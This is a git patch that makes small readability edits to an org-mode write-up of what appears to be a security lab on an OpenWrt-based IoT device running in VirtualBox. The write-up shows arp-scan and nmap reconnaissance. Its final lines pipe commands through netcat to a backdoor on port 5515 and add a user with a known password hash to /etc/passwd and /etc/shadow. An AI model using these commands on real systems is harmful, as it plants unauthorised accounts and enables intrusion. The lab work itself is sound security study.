From 9507504b2ffb61cbe3f7fcb46286d78c4fb34127 Mon Sep 17 00:00:00 2001 From: TuDatTr Date: Sun, 15 Aug 2021 13:14:46 +0200 Subject: [PATCH] Some small fixes to improve readability --- writeup.org | 20 ++++++++++---------- 1 file changed, 10 insertions(+), 10 deletions(-) diff --git a/writeup.org b/writeup.org index 4e30aa0..32e10bb 100644 --- a/writeup.org +++ b/writeup.org @@ -4,7 +4,7 @@ * Vulnerabilty Analysis Given files: - #+begin_src sh :results output :exports results :cache yes + #+begin_src sh :results output :exports both :cache yes ls ./data/ -lA #+end_src @@ -15,7 +15,7 @@ : -rw-r--r-- 1 tuan tuan 9778176 Jun 29 13:33 Sysssec IoT Device.ova - ~passwords.txt~: Password list for brute forcing - #+begin_src sh :results output :exports results :cache yes + #+begin_src sh :results output :exports both :cache yes file ./data/passwords.txt #+end_src @@ -23,7 +23,7 @@ : ./data/passwords.txt: ASCII text - ~Syssec IoT Device.bin~: Firmware binary of target for static analysis - #+begin_src sh :results output :exports results :cache yes + #+begin_src sh :results output :exports both :cache yes file ./data/Syssec\ IoT\ Device.bin #+end_src @@ -31,7 +31,7 @@ : ./data/Syssec IoT Device.bin: firmware 4300 v1 OpenWrt r16916-7f946a880a, 8126464 bytes or less, at 0x200 2054221 bytes , at 0x1f5a50 2813038 bytes - ~Sysssec IoT Device.ova~: Virtual Box image of target for dynamic analysis - #+begin_src sh :results output :exports results :cache yes + #+begin_src sh :results output :exports both :cache yes file ./data/Sysssec\ IoT\ Device.ova #+end_src @@ -64,7 +64,7 @@ Note! This error could also mean that an incompatible version of the 'Oracle VM To do this I had to add a network interface on the Virtual Box management interface. After doing that I got the necessary network interface. - #+begin_src sh :results output :exports results :cache yes + #+begin_src sh :results output :exports both :cache yes ifconfig vboxnet0 #+end_src @@ -80,7 +80,7 @@ Note! This error could also mean that an incompatible version of the 'Oracle VM : Afterwards an arpscan was possible: - #+begin_src sh :results output :exports results :cache yes :dir /sudo::. :async + #+begin_src sh :results output :exports both :cache yes :dir /sudo::. :async arp-scan --interface vboxnet0 --local #+end_src @@ -101,7 +101,7 @@ Note! This error could also mean that an incompatible version of the 'Oracle VM Scanning both devices with nmap shows, that ~192.168.56.100~ doesn't have open ports, so it doesnt seem to be our target device. Here I simply create a variable for our targets IP-address, so we don't have to remember it and enter it manually. - #+begin_src sh :exports none :cache yes + #+begin_src sh :exports both :cache yes TARGET=192.168.56.101 echo $TARGET #+end_src @@ -109,9 +109,9 @@ Note! This error could also mean that an incompatible version of the 'Oracle VM #+RESULTS[e651e12124dbd06fdedd668151d35ece3ac2dd42]: : 192.168.56.101 - ~192.168.56.101~ returns the following nmap scan: + nmap on ~192.168.56.101~ returns the following result: #+begin_src sh :results output :exports both :cache yes :eval query :var TARGET="192.168.56.101" :async - nmap $TARGET -p- + nmap $TARGET -p- #+end_src #+RESULTS[abdd9931accb0b2a75ae935a706feaf4d361f9c7]: @@ -231,7 +231,7 @@ Note! This error could also mean that an incompatible version of the 'Oracle VM With the backdoor detected on port ~5515~ we can netcat onto it and get a shell. - To add the user =tuan= and with the password =password= we executed the following code snippets: + To add the user =tuan= with the password =password= we executed the following code snippets: #+begin_src sh :results output :exports code :cache yes :var TARGET="192.168.56.101" :async echo "echo tuan:x:1001:1001::/root:/bin/ash >> /etc/passwd;exit" | nc -nv $TARGET 5515 echo 'echo tuan:\$1\$123456\$qqQvjw0PqIk7otmzNsUIN0:18145:0:99999:7::: >> /etc/shadow;exit' | nc -nv $TARGET 5515